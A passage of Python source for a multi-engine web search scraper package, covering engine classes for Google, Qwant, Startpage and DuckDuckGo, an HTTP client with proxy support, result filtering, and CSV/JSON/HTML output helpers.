timeout=TIMEOUT): 9 | super(Google, self).__init__(proxy, timeout) 10 | self._base_url = 'https://www.google.com' 11 | self._delay = (2, 6) 12 | self._current_page = 1 13 | 14 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 15 | 16 | def _selectors(self, element): 17 | '''Returns the appropriate CSS selector.''' 18 | selectors = { 19 | 'url': 'a[href]', 20 | 'title': 'a', 21 | 'text': 'div[data-content-feature="1"]', 22 | 'links': 'div#search div.g', 23 | 'next': 'a[href][aria-label="Page {page}"]' 24 | } 25 | return selectors[element] 26 | 27 | def _first_page(self): 28 | '''Returns the initial page and query.''' 29 | url = u'{}/search?q={}'.format(self._base_url, self._query) 30 | return {'url':url, 'data':None} 31 | 32 | def _next_page(self, tags): 33 | '''Returns the next page URL and post data (if any)''' 34 | self._current_page += 1 35 | selector = self._selectors('next').format(page=self._current_page) 36 | next_page = self._get_tag_item(tags.select_one(selector), 'href') 37 | url = None 38 | if next_page: 39 | url = self._base_url + next_page 40 | return {'url':url, 'data':None} 41 | 42 | def _get_url(self, tag, item='href'): 43 | '''Returns the URL of search results item.''' 44 | selector = self._selectors('url') 45 | url = self._get_tag_item(tag.select_one(selector), item) 46 | 47 | if url.startswith(u'/url?q='): 48 | url = url.replace(u'/url?q=', u'').split(u'&sa=')[0] 49 | return unquote_url(url) 50 | -------------------------------------------------------------------------------- /search_engines/http_client.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from collections import namedtuple 3 | 4 | from .config import TIMEOUT, PROXY, USER_AGENT 5 | from . import utils as utl 6 | 7 | 8 | class HttpClient(object): 9 | '''Performs HTTP requests. A `requests` wrapper, essentialy''' 10 | def __init__(self, timeout=TIMEOUT, proxy=PROXY): 11 | self.session = requests.session() 12 | self.session.proxies = self._set_proxy(proxy) 13 | self.session.headers['User-Agent'] = USER_AGENT 14 | self.session.headers['Accept-Language'] = 'en-GB,en;q=0.5' 15 | 16 | self.timeout = timeout 17 | self.response = namedtuple('response', ['http', 'html']) 18 | 19 | def get(self, page): 20 | '''Submits a HTTP GET request.''' 21 | page = self._quote(page) 22 | try: 23 | req = self.session.get(page, timeout=self.timeout) 24 | self.session.headers['Referer'] = page 25 | except requests.exceptions.RequestException as e: 26 | return self.response(http=0, html=e.__doc__) 27 | return self.response(http=req.status_code, html=req.text) 28 | 29 | def post(self, page, data): 30 | '''Submits a HTTP POST request.''' 31 | page = self._quote(page) 32 | try: 33 | req = self.session.post(page, data, timeout=self.timeout) 34 | self.session.headers['Referer'] = page 35 | except requests.exceptions.RequestException as e: 36 | return self.response(http=0, html=e.__doc__) 37 | return self.response(http=req.status_code, html=req.text) 38 | 39 | def _quote(self, url): 40 | '''URL-encodes URLs.''' 41 | if utl.decode_bytes(utl.unquote_url(url)) == utl.decode_bytes(url): 42 | url = utl.quote_url(url) 43 | return url 44 | 45 | def _set_proxy(self, proxy): 46 | '''Returns HTTP or SOCKS proxies dictionary.''' 47 | if proxy: 48 | if not utl.is_url(proxy): 49 | raise ValueError('Invalid proxy format!') 50 | proxy = {'http':proxy, 'https':proxy} 51 | return proxy 52 | 53 | -------------------------------------------------------------------------------- /search_engines/engines/qwant.py: -------------------------------------------------------------------------------- 1 | from json import loads 2 | 3 | from ..engine import SearchEngine 4 | from ..config import PROXY, TIMEOUT 5 | from ..utils import unquote_url 6 | 7 | 8 | class Qwant(SearchEngine): 9 | '''Searches qwant.com''' 10 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 11 | super(Qwant, self).__init__(proxy, timeout) 12 | self._base_url = u'https://api.qwant.com/v3/search/web?q={}&count=10&locale=en_US&offset={}&device=desktop&safesearch=1' 13 | self._offset = 0 14 | self._max_offset = 50 15 | 16 | def _selectors(self, element): 17 | '''Returns the appropriate CSS selector.''' 18 | selectors = { 19 | 'url': 'url', 20 | 'title': 'title', 21 | 'text': 'desc', 22 | 'links': ['data', 'result', 'items', 'mainline'] 23 | } 24 | return selectors[element] 25 | 26 | def _first_page(self): 27 | '''Returns the initial page and query.''' 28 | url = self._base_url.format(self._query, self._offset) 29 | return {'url':url, 'data':None} 30 | 31 | def _next_page(self, tags): 32 | '''Returns the next page URL and post data (if any)''' 33 | self._offset += 10 34 | url = None 35 | status = loads(tags.get_text())['status'] 36 | if status == 'success' and self._offset <= self._max_offset: 37 | url = self._base_url.format(self._query, self._offset) 38 | return {'url':url, 'data':None} 39 | 40 | def _get_url(self, tag, item='href'): 41 | '''Returns the URL of search results item.''' 42 | return unquote_url(tag.get(self._selectors('url'), u'')) 43 | 44 | def _get_title(self, tag, item='text'): 45 | '''Returns the title of search results items.''' 46 | return tag.get(self._selectors('title'), u'') 47 | 48 | def _get_text(self, tag, item='text'): 49 | '''Returns the text of search results items.''' 50 | return tag.get(self._selectors('text'), u'') 51 | 52 | def _filter_results(self, soup): 53 | '''Processes and filters the search results.''' 54 | tags = loads(soup.get_text())['data']['result']['items']['mainline'] 55 | tags = [j for i in tags for j in i['items'] if i['type'] != u'ads'] 56 | results = [self._item(l) for l in tags] 57 | 58 | if u'url' in self._filters: 59 | results = [l for l in results if self._query_in(l['link'])] 60 | if u'title' in self._filters: 61 | results = [l for l in results if self._query_in(l['title'])] 62 | if u'text' in self._filters: 63 | results = [l for l in results if self._query_in(l['text'])] 64 | if u'host' in self._filters: 65 | results = [l for l in results if self._query_in(utils.domain(l['link']))] 66 | return results 67 | -------------------------------------------------------------------------------- /search_engines/engines/startpage.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup 2 | 3 | from ..engine import SearchEngine 4 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 5 | from .. import output as out 6 | 7 | 8 | class Startpage(SearchEngine): 9 | '''Searches startpage.com''' 10 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 11 | super(Startpage, self).__init__(proxy, timeout) 12 | self._base_url = 'https://www.startpage.com' 13 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 14 | 15 | def _selectors(self, element): 16 | '''Returns the appropriate CSS selector.''' 17 | selectors = { 18 | 'url': 'a.w-gl__result-url', 19 | 'title': 'a.w-gl__result-title h3', 20 | 'text': 'p.w-gl__description', 21 | 'links': 'section.w-gl div.w-gl__result', 22 | 'next': {'form':'form.pagination__form', 'text':'Next'}, 23 | 'search_form': 'form#search input[name]', 24 | 'blocked_form': 'form#blocked_feedback_form' 25 | } 26 | return selectors[element] 27 | 28 | def _first_page(self): 29 | '''Returns the initial page and query.''' 30 | response = self._get_page(self._base_url) 31 | tags = BeautifulSoup(response.html, "html.parser") 32 | selector = self._selectors('search_form') 33 | 34 | data = { 35 | i['name']: i.get('value', '') 36 | for i in tags.select(selector) 37 | } 38 | data['query'] = self._query 39 | url = self._base_url + '/sp/search' 40 | return {'url':url, 'data':data} 41 | 42 | def _next_page(self, tags): 43 | '''Returns the next page URL and post data (if any)''' 44 | selector = self._selectors('next') 45 | forms = [ 46 | form 47 | for form in tags.select(selector['form']) 48 | if form.get_text(strip=True) == selector['text'] 49 | ] 50 | url, data = None, None 51 | if forms: 52 | url = self._base_url + forms[0]['action'] 53 | data = { 54 | i['name']:i.get('value', '') 55 | for i in forms[0].select('input') 56 | } 57 | return {'url':url, 'data':data} 58 | 59 | def _is_ok(self, response): 60 | '''Checks if the HTTP response is 200 OK.''' 61 | soup = BeautifulSoup(response.html, 'html.parser') 62 | selector = self._selectors('blocked_form') 63 | is_blocked = soup.select_one(selector) 64 | 65 | self.is_banned = response.http in [403, 429, 503] or is_blocked 66 | 67 | if response.http == 200 and not is_blocked: 68 | return True 69 | msg = 'Banned' if is_blocked else ('HTTP ' + str(response.http)) if response.http else response.html 70 | out.console(msg, level=out.Level.error) 71 | return False 72 | -------------------------------------------------------------------------------- /search_engines/engines/duckduckgo.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT 3 | 4 | import re 5 | import json 6 | from bs4 import BeautifulSoup 7 | 8 | 9 | class Duckduckgo(SearchEngine): 10 | '''Searches duckduckgo.com''' 11 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 12 | super(Duckduckgo, self).__init__(proxy, timeout) 13 | self._base_url = u'https://links.duckduckgo.com{}&biaexp=b&msvrtexp=b&videxp=a&nadse=b&tjsexp=b' 14 | self._main_url = u'https://duckduckgo.com/?q={}&t=h_' 15 | self._current_page = None 16 | 17 | def _selectors(self, element): 18 | '''Returns the appropriate CSS selector - regex pattern, in this case.''' 19 | selectors = { 20 | 'first_page': r'DDG\.deep\.initialize\(\'(.*?)\'\)', 21 | 'next_page': r'"n"\:\s*"(/d\.js.*?)"', 22 | 'results': r"DDG\.pageLayout\.load\('d'\,\s*(\[.*?\])\s*\);" 23 | } 24 | return selectors[element] 25 | 26 | def _first_page(self): 27 | '''Returns the initial page and query.''' 28 | res = self._http_client.get(self._main_url.format(self._query)) 29 | match = re.search(self._selectors('first_page'), res.html) 30 | if match: 31 | return {'url':self._base_url.format(match.group(1)), 'data':None} 32 | return {'url':None, 'data':None} 33 | 34 | def _next_page(self, tags): 35 | '''Returns the next page URL and post data (if any)''' 36 | match = re.search(self._selectors('next_page'), tags.get_text()) 37 | if match: 38 | return {'url':self._base_url.format(match.group(1)), 'data':None} 39 | return {'url':None, 'data':None} 40 | 41 | def _get_page(self, page, data=None): 42 | '''Gets pagination links.''' 43 | self._http_client.session.headers['Referer'] = 'https://duckduckgo.com/' 44 | response = self._http_client.get(page) 45 | self._current_page = response.html 46 | return response 47 | 48 | def _filter_results(self, soup): 49 | '''Processes and filters the search results.''' 50 | match = re.search(self._selectors('results'), self._current_page) 51 | if not match: 52 | return {} 53 | data = json.loads(re.sub('\n|\r', '', match.group(1)))[:-1] 54 | results = [ 55 | {'link':i['u'], 'title':i['t'], 'text': BeautifulSoup(i['a'], 'html.parser').get_text()} 56 | for i in data 57 | ] 58 | 59 | if u'url' in self._filters: 60 | results = [l for l in results if self._query_in(l['link'])] 61 | if u'title' in self._filters: 62 | results = [l for l in results if self._query_in(l['title'])] 63 | if u'text' in self._filters: 64 | results = [l for l in results if self._query_in(l['text'])] 65 | if u'host' in self._filters: 66 | results = [l for l in results if self._query_in(utils.domain(l['link']))] 67 | return results 68 | -------------------------------------------------------------------------------- /search_engines/multiple_search_engines.py: -------------------------------------------------------------------------------- 1 | from .results import SearchResults 2 | from .engines import search_engines_dict 3 | from . import output as out 4 | from . import config as cfg 5 | 6 | 7 | class MultipleSearchEngines(object): 8 | '''Uses multiple search engines.''' 9 | def __init__(self, engines, proxy=cfg.PROXY, timeout=cfg.TIMEOUT): 10 | self._engines = [ 11 | se(proxy, timeout) 12 | for se in search_engines_dict.values() 13 | if se.__name__.lower() in engines 14 | ] 15 | self._filter = None 16 | 17 | self.ignore_duplicate_urls = False 18 | self.ignore_duplicate_domains = False 19 | self.results = SearchResults() 20 | self.banned_engines = [] 21 | 22 | def set_search_operator(self, operator): 23 | '''Filters search results based on the operator.''' 24 | self._filter = operator 25 | 26 | def search(self, query, pages=cfg.SEARCH_ENGINE_RESULTS_PAGES): 27 | '''Searches multiples engines and collects the results.''' 28 | self.results = SearchResults() 29 | for engine in self._engines: 30 | engine.ignore_duplicate_urls = self.ignore_duplicate_urls 31 | engine.ignore_duplicate_domains = self.ignore_duplicate_domains 32 | if self._filter: 33 | engine.set_search_operator(self._filter) 34 | 35 | engine_results = engine.search(query, pages) 36 | if engine.ignore_duplicate_urls: 37 | engine_results._results = [ 38 | item for item in engine_results._results 39 | if item['link'] not in self.results.links() 40 | ] 41 | if self.ignore_duplicate_domains: 42 | engine_results._results = [ 43 | item for item in engine_results._results 44 | if item['host'] not in self.results.hosts() 45 | ] 46 | self.results._results += engine_results._results 47 | 48 | if engine.is_banned: 49 | self.banned_engines.append(engine.__class__.__name__) 50 | return self.results 51 | 52 | def output(self, output=out.PRINT, path=None): 53 | '''Prints search results and/or creates report files.''' 54 | output = (output or '').lower() 55 | query = self._engines[0]._query if self._engines else u'' 56 | if not path: 57 | path = cfg.OUTPUT_DIR + u'_'.join(query.split()) 58 | out.console('') 59 | 60 | if out.PRINT in output: 61 | out.print_results(self._engines) 62 | if out.HTML in output: 63 | out.write_file(out.create_html_data(self._engines), path + u'.html') 64 | if out.CSV in output: 65 | out.write_file(out.create_csv_data(self._engines), path + u'.csv') 66 | if out.JSON in output: 67 | out.write_file(out.create_json_data(self._engines), path + u'.json') 68 | 69 | 70 | class AllSearchEngines(MultipleSearchEngines): 71 | '''Uses all search engines.''' 72 | def __init__(self, proxy=cfg.PROXY, timeout=cfg.TIMEOUT): 73 | super(AllSearchEngines, self).__init__( 74 | list(search_engines_dict), proxy, timeout 75 | ) 76 | 77 | -------------------------------------------------------------------------------- /search_engines/libs/get_terminal_size.py: -------------------------------------------------------------------------------- 1 | ## Code taken from https://github.com/chrippa/backports.shutil_get_terminal_size/blob/master/backports/shutil_get_terminal_size/get_terminal_size.py 2 | 3 | """This is a backport of shutil.get_terminal_size from Python 3.3. 4 | The original implementation is in C, but here we use the ctypes and 5 | fcntl modules to create a pure Python version of os.get_terminal_size. 6 | """ 7 | 8 | import os 9 | import struct 10 | import sys 11 | 12 | from collections import namedtuple 13 | 14 | __all__ = ["get_terminal_size"] 15 | 16 | 17 | terminal_size = namedtuple("terminal_size", "columns lines") 18 | 19 | try: 20 | from ctypes import windll, create_string_buffer, WinError 21 | 22 | _handle_ids = { 23 | 0: -10, 24 | 1: -11, 25 | 2: -12, 26 | } 27 | 28 | def _get_terminal_size(fd): 29 | handle = windll.kernel32.GetStdHandle(_handle_ids[fd]) 30 | if handle == 0: 31 | raise OSError('handle cannot be retrieved') 32 | if handle == -1: 33 | raise WinError() 34 | csbi = create_string_buffer(22) 35 | res = windll.kernel32.GetConsoleScreenBufferInfo(handle, csbi) 36 | if res: 37 | res = struct.unpack("hhhhHhhhhhh", csbi.raw) 38 | left, top, right, bottom = res[5:9] 39 | columns = right - left + 1 40 | lines = bottom - top + 1 41 | return terminal_size(columns, lines) 42 | else: 43 | raise WinError() 44 | 45 | except ImportError: 46 | import fcntl 47 | import termios 48 | 49 | def _get_terminal_size(fd): 50 | try: 51 | res = fcntl.ioctl(fd, termios.TIOCGWINSZ, b"\x00" * 4) 52 | except IOError as e: 53 | raise OSError(e) 54 | lines, columns = struct.unpack("hh", res) 55 | 56 | return terminal_size(columns, lines) 57 | 58 | 59 | def get_terminal_size(fallback=(80, 24)): 60 | """Get the size of the terminal window. 61 | For each of the two dimensions, the environment variable, COLUMNS 62 | and LINES respectively, is checked. If the variable is defined and 63 | the value is a positive integer, it is used. 64 | When COLUMNS or LINES is not defined, which is the common case, 65 | the terminal connected to sys.__stdout__ is queried 66 | by invoking os.get_terminal_size. 67 | If the terminal size cannot be successfully queried, either because 68 | the system doesn't support querying, or because we are not 69 | connected to a terminal, the value given in fallback parameter 70 | is used. Fallback defaults to (80, 24) which is the default 71 | size used by many terminal emulators. 72 | The value returned is a named tuple of type os.terminal_size. 73 | """ 74 | # Try the environment first 75 | try: 76 | columns = int(os.environ["COLUMNS"]) 77 | except (KeyError, ValueError): 78 | columns = 0 79 | 80 | try: 81 | lines = int(os.environ["LINES"]) 82 | except (KeyError, ValueError): 83 | lines = 0 84 | 85 | # Only query if necessary 86 | if columns <= 0 or lines <= 0: 87 | try: 88 | size = _get_terminal_size(sys.__stdout__.fileno()) 89 | except (NameError, OSError): 90 | size = terminal_size(*fallback) 91 | 92 | if columns <= 0: 93 | columns = size.columns 94 | if lines <= 0: 95 | lines = size.lines 96 | 97 | return terminal_size(columns, lines) 98 | 99 | -------------------------------------------------------------------------------- /search_engines/output.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | 3 | import csv 4 | import json 5 | import io 6 | import re 7 | from collections import namedtuple 8 | 9 | try: 10 | from shutil import get_terminal_size 11 | except ImportError: 12 | from .libs.get_terminal_size import get_terminal_size 13 | 14 | from .utils import encode_str, decode_bytes 15 | from .libs import windows_cmd_encoding 16 | from .config import PYTHON_VERSION 17 | 18 | 19 | def print_results(search_engines): 20 | '''Prints the search results.''' 21 | for engine in search_engines: 22 | console(engine.__class__.__name__ + u' results') 23 | 24 | for i, v in enumerate(engine.results, 1): 25 | console(u'{:<4}{}'.format(i, v['link'])) 26 | console(u'') 27 | 28 | def create_csv_data(search_engines): 29 | '''CSV formats the search results.''' 30 | encoder = decode_bytes if PYTHON_VERSION == 3 else encode_str 31 | data = [['query', 'engine', 'domain', 'URL', 'title', 'text']] 32 | 33 | for engine in search_engines: 34 | for i in engine.results: 35 | row = [ 36 | engine._query, engine.__class__.__name__, 37 | i['host'], i['link'], i['title'], i['text'] 38 | ] 39 | row = [encoder(i) for i in row] 40 | data.append(row) 41 | return data 42 | 43 | def create_json_data(search_engines): 44 | '''JSON formats the search results.''' 45 | jobj = { 46 | u'query': search_engines[0]._query, 47 | u'results': { 48 | se.__class__.__name__: [i for i in se.results] 49 | for se in search_engines 50 | } 51 | } 52 | return json.dumps(jobj) 53 | 54 | def create_html_data(search_engines): 55 | '''HTML formats the search results.''' 56 | query = decode_bytes(search_engines[0]._query) if search_engines else u'' 57 | tables = u'' 58 | 59 | for engine in search_engines: 60 | rows = u'' 61 | for i, v in enumerate(engine.results, 1): 62 | data = u'' 63 | if u'title' in engine._filters: 64 | data += HtmlTemplate.data.format(_replace_with_bold(query, v['title'])) 65 | if u'text' in engine._filters: 66 | data += HtmlTemplate.data.format(_replace_with_bold(query, v['text'])) 67 | link = _replace_with_bold(query, v['link']) if u'url' in engine._filters else v['link'] 68 | rows += HtmlTemplate.row.format(number=i, href=v['link'], link=link, data=data) 69 | 70 | engine_name = engine.__class__.__name__ 71 | tables += HtmlTemplate.table.format(engine=engine_name, rows=rows) 72 | return HtmlTemplate.html.format(query=query, table=tables) 73 | 74 | def _replace_with_bold(query, data): 75 | '''Places the query in tags.''' 76 | for match in re.findall(query, data, re.I): 77 | data = data.replace(match, u'{}'.format(match)) 78 | return data 79 | 80 | 81 | def write_file(data, path, encoding='utf-8'): 82 | '''Writes search results data to file.''' 83 | try: 84 | if PYTHON_VERSION == 2 and type(data) in (list, str): 85 | f = io.open(path, 'wb') 86 | else: 87 | f = io.open(path, 'w', encoding=encoding, newline='') 88 | 89 | if type(data) is list: 90 | writer = csv.writer(f) 91 | writer.writerows(data) 92 | else: 93 | f.write(data) 94 | f.close() 95 | console(u'Output file: ' + path) 96 | except IOError as e: 97 | console(e, level=Level.error) 98 | 99 | 100 | def console(msg, end='\n', level=None): 101 | '''Prints data on the console.''' 102 | console_len = get_terminal_size().columns 103 | clear_line = u'\r{}\r'.format(u' ' * (console_len - 1)) 104 | msg = clear_line + (level or u'') + msg 105 | print(msg, end=end) 106 | 107 | Level = namedtuple('Level', ['info', 'warning', 'error'])( 108 | info = u'INFO ', 109 | warning = u'WARNING ', 110 | error = u'ERROR ' 111 | ) 112 | 113 | PRINT = 'print' 114 | HTML = 'html' 115 | JSON = 'json' 116 | CSV = 'csv' 117 | 118 | 119 | class HtmlTemplate: 120 | '''HTML template.''' 121 | html = u''' 122 | 123 | 124 | Search Results 125 | 132 | 133 | 134 | 135 | 136 | 137 |
Query: '{query}'
138 | {table} 139 | 140 | 141 | ''' 142 | table = u''' 143 | 144 |
{engine} search results
145 | 146 | {rows} 147 |
148 |
149 | ''' 150 | row = u''' 151 | {number}) 152 | {link} 153 | {data} 154 | 155 | ''' 156 | data = u'''{}''' 157 | 158 | -------------------------------------------------------------------------------- /search_engines/engine.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup 2 | from time import sleep 3 | from random import uniform as random_uniform 4 | 5 | from .results import SearchResults 6 | from .http_client import HttpClient 7 | from . import utils 8 | from . import output as out 9 | from . import config as cfg 10 | 11 | 12 | class SearchEngine(object): 13 | '''The base class for all Search Engines.''' 14 | def __init__(self, proxy=cfg.PROXY, timeout=cfg.TIMEOUT): 15 | ''' 16 | :param str proxy: optional, a proxy server 17 | :param int timeout: optional, the HTTP timeout 18 | ''' 19 | self._http_client = HttpClient(timeout, proxy) 20 | self._delay = (1, 4) 21 | self._query = '' 22 | self._filters = [] 23 | 24 | self.results = SearchResults() 25 | '''The search results.''' 26 | self.ignore_duplicate_urls = False 27 | '''Collects only unique URLs.''' 28 | self.ignore_duplicate_domains = False 29 | '''Collects only unique domains.''' 30 | self.is_banned = False 31 | '''Indicates if a ban occured''' 32 | 33 | def _selectors(self, element): 34 | '''Returns the appropriate CSS selector.''' 35 | raise NotImplementedError() 36 | 37 | def _first_page(self): 38 | '''Returns the initial page URL.''' 39 | raise NotImplementedError() 40 | 41 | def _next_page(self, tags): 42 | '''Returns the next page URL and post data.''' 43 | raise NotImplementedError() 44 | 45 | def _get_url(self, tag, item='href'): 46 | '''Returns the URL of search results items.''' 47 | selector = self._selectors('url') 48 | url = self._get_tag_item(tag.select_one(selector), item) 49 | return utils.unquote_url(url) 50 | 51 | def _get_title(self, tag, item='text'): 52 | '''Returns the title of search results items.''' 53 | selector = self._selectors('title') 54 | return self._get_tag_item(tag.select_one(selector), item) 55 | 56 | def _get_text(self, tag, item='text'): 57 | '''Returns the text of search results items.''' 58 | selector = self._selectors('text') 59 | return self._get_tag_item(tag.select_one(selector), item) 60 | 61 | def _get_page(self, page, data=None): 62 | '''Gets pagination links.''' 63 | if data: 64 | return self._http_client.post(page, data) 65 | return self._http_client.get(page) 66 | 67 | def _get_tag_item(self, tag, item): 68 | '''Returns Tag attributes.''' 69 | if not tag: 70 | return u'' 71 | return tag.text if item == 'text' else tag.get(item, u'') 72 | 73 | def _item(self, link): 74 | '''Returns a dictionary of the link data.''' 75 | return { 76 | 'host': utils.domain(self._get_url(link)), 77 | 'link': self._get_url(link), 78 | 'title': self._get_title(link).strip(), 79 | 'text': self._get_text(link).strip() 80 | } 81 | 82 | def _query_in(self, item): 83 | '''Checks if query is contained in the item.''' 84 | return self._query.lower() in item.lower() 85 | 86 | def _filter_results(self, soup): 87 | '''Processes and filters the search results.''' 88 | tags = soup.select(self._selectors('links')) 89 | results = [self._item(l) for l in tags] 90 | 91 | if u'url' in self._filters: 92 | results = [l for l in results if self._query_in(l['link'])] 93 | if u'title' in self._filters: 94 | results = [l for l in results if self._query_in(l['title'])] 95 | if u'text' in self._filters: 96 | results = [l for l in results if self._query_in(l['text'])] 97 | if u'host' in self._filters: 98 | results = [l for l in results if self._query_in(utils.domain(l['link']))] 99 | return results 100 | 101 | def _collect_results(self, items): 102 | '''Colects the search results items.''' 103 | for item in items: 104 | if not utils.is_url(item['link']): 105 | continue 106 | if item in self.results: 107 | continue 108 | if self.ignore_duplicate_urls and item['link'] in self.results.links(): 109 | continue 110 | if self.ignore_duplicate_domains and item['host'] in self.results.hosts(): 111 | continue 112 | self.results.append(item) 113 | 114 | def _is_ok(self, response): 115 | '''Checks if the HTTP response is 200 OK.''' 116 | self.is_banned = response.http in [403, 429, 503] 117 | 118 | if response.http == 200: 119 | return True 120 | msg = ('HTTP ' + str(response.http)) if response.http else response.html 121 | out.console(msg, level=out.Level.error) 122 | return False 123 | 124 | def set_headers(self, headers): 125 | '''Sets HTTP headers. 126 | 127 | :param headers: dict The headers 128 | ''' 129 | self._http_client.session.headers.update(headers) 130 | 131 | def set_search_operator(self, operator): 132 | '''Filters search results based on the operator. 133 | Supported operators: 'url', 'title', 'text', 'host' 134 | 135 | :param operator: str The search operator(s) 136 | ''' 137 | operators = utils.decode_bytes(operator or u'').lower().split(u',') 138 | supported_operators = [u'url', u'title', u'text', u'host'] 139 | 140 | for operator in operators: 141 | if operator not in supported_operators: 142 | msg = u'Ignoring unsupported operator "{}"'.format(operator) 143 | out.console(msg, level=out.Level.warning) 144 | else: 145 | self._filters += [operator] 146 | 147 | def search(self, query, pages=cfg.SEARCH_ENGINE_RESULTS_PAGES): 148 | '''Queries the search engine, goes through the pages and collects the results. 149 | 150 | :param query: str The search query 151 | :param pages: int Optional, the maximum number of results pages to search 152 | :returns SearchResults object 153 | ''' 154 | # out.console('Searching {}'.format(self.__class__.__name__)) 155 | self._query = utils.decode_bytes(query) 156 | self.results = SearchResults() 157 | request = self._first_page() 158 | 159 | for page in range(1, pages + 1): 160 | try: 161 | response = self._get_page(request['url'], request['data']) 162 | if not self._is_ok(response): 163 | break 164 | tags = BeautifulSoup(response.html, "html.parser") 165 | items = self._filter_results(tags) 166 | self._collect_results(items) 167 | 168 | msg = 'page: {:<8} links: {}'.format(page, len(self.results)) 169 | out.console(msg, end='') 170 | request = self._next_page(tags) 171 | 172 | if not request['url']: 173 | break 174 | if page < pages: 175 | sleep(random_uniform(*self._delay)) 176 | except KeyboardInterrupt: 177 | break 178 | out.console('', end='') 179 | return self.results 180 | 181 | def output(self, output=out.PRINT, path=None): 182 | '''Prints search results and/or creates report files. 183 | Supported output format: html, csv, json. 184 | 185 | :param output: str Optional, the output format 186 | :param path: str Optional, the file to save the report 187 | ''' 188 | output = (output or '').lower() 189 | if not path: 190 | path = cfg.os_path.join(cfg.OUTPUT_DIR, u'_'.join(self._query.split())) 191 | out.console('') 192 | 193 | if out.PRINT in output: 194 | out.print_results([self]) 195 | if out.HTML in output: 196 | out.write_file(out.create_html_data([self]), path + u'.html') 197 | if out.CSV in output: 198 | out.write_file(out.create_csv_data([self]), path + u'.csv') 199 | if out.JSON in output: 200 | out.write_file(out.create_json_data([self]), path + u'.json') 201 | -------------------------------------------------------------------------------- /search_engines/libs/windows_cmd_encoding.py: -------------------------------------------------------------------------------- 1 | # Code taken from this great answer on stackoverflow.com: 2 | # https://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/3259271#3259271 3 | # Many thanks to the author, Daira Hopwood https://stackoverflow.com/users/393146/daira-hopwood 4 | 5 | 6 | import sys 7 | 8 | if sys.platform == "win32" and sys.version_info.major == 2: 9 | import codecs 10 | from ctypes import WINFUNCTYPE, windll, POINTER, byref, c_int 11 | from ctypes.wintypes import BOOL, HANDLE, DWORD, LPWSTR, LPCWSTR, LPVOID 12 | 13 | original_stderr = sys.stderr 14 | 15 | # If any exception occurs in this code, we'll probably try to print it on stderr, 16 | # which makes for frustrating debugging if stderr is directed to our wrapper. 17 | # So be paranoid about catching errors and reporting them to original_stderr, 18 | # so that we can at least see them. 19 | def _complain(message): 20 | print >>original_stderr, message if isinstance(message, str) else repr(message) 21 | 22 | # Work around . 23 | codecs.register(lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None) 24 | 25 | # Make Unicode console output work independently of the current code page. 26 | # This also fixes . 27 | # Credit to Michael Kaplan 28 | # and TZOmegaTZIOY 29 | # . 30 | try: 31 | # 32 | # HANDLE WINAPI GetStdHandle(DWORD nStdHandle); 33 | # returns INVALID_HANDLE_VALUE, NULL, or a valid handle 34 | # 35 | # 36 | # DWORD WINAPI GetFileType(DWORD hFile); 37 | # 38 | # 39 | # BOOL WINAPI GetConsoleMode(HANDLE hConsole, LPDWORD lpMode); 40 | 41 | GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)(("GetStdHandle", windll.kernel32)) 42 | STD_OUTPUT_HANDLE = DWORD(-11) 43 | STD_ERROR_HANDLE = DWORD(-12) 44 | GetFileType = WINFUNCTYPE(DWORD, DWORD)(("GetFileType", windll.kernel32)) 45 | FILE_TYPE_CHAR = 0x0002 46 | FILE_TYPE_REMOTE = 0x8000 47 | GetConsoleMode = WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))(("GetConsoleMode", windll.kernel32)) 48 | INVALID_HANDLE_VALUE = DWORD(-1).value 49 | 50 | def not_a_console(handle): 51 | if handle == INVALID_HANDLE_VALUE or handle is None: 52 | return True 53 | return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR 54 | or GetConsoleMode(handle, byref(DWORD())) == 0) 55 | 56 | old_stdout_fileno = None 57 | old_stderr_fileno = None 58 | if hasattr(sys.stdout, 'fileno'): 59 | old_stdout_fileno = sys.stdout.fileno() 60 | if hasattr(sys.stderr, 'fileno'): 61 | old_stderr_fileno = sys.stderr.fileno() 62 | 63 | STDOUT_FILENO = 1 64 | STDERR_FILENO = 2 65 | real_stdout = (old_stdout_fileno == STDOUT_FILENO) 66 | real_stderr = (old_stderr_fileno == STDERR_FILENO) 67 | 68 | if real_stdout: 69 | hStdout = GetStdHandle(STD_OUTPUT_HANDLE) 70 | if not_a_console(hStdout): 71 | real_stdout = False 72 | 73 | if real_stderr: 74 | hStderr = GetStdHandle(STD_ERROR_HANDLE) 75 | if not_a_console(hStderr): 76 | real_stderr = False 77 | 78 | if real_stdout or real_stderr: 79 | # BOOL WINAPI WriteConsoleW(HANDLE hOutput, LPWSTR lpBuffer, DWORD nChars, 80 | # LPDWORD lpCharsWritten, LPVOID lpReserved); 81 | 82 | WriteConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)(("WriteConsoleW", windll.kernel32)) 83 | 84 | class UnicodeOutput: 85 | def __init__(self, hConsole, stream, fileno, name): 86 | self._hConsole = hConsole 87 | self._stream = stream 88 | self._fileno = fileno 89 | self.closed = False 90 | self.softspace = False 91 | self.mode = 'w' 92 | self.encoding = 'utf-8' 93 | self.name = name 94 | self.flush() 95 | 96 | def isatty(self): 97 | return False 98 | 99 | def close(self): 100 | # don't really close the handle, that would only cause problems 101 | self.closed = True 102 | 103 | def fileno(self): 104 | return self._fileno 105 | 106 | def flush(self): 107 | if self._hConsole is None: 108 | try: 109 | self._stream.flush() 110 | except Exception as e: 111 | _complain("%s.flush: %r from %r" % (self.name, e, self._stream)) 112 | raise 113 | 114 | def write(self, text): 115 | try: 116 | if self._hConsole is None: 117 | if isinstance(text, unicode): 118 | text = text.encode('utf-8') 119 | self._stream.write(text) 120 | else: 121 | if not 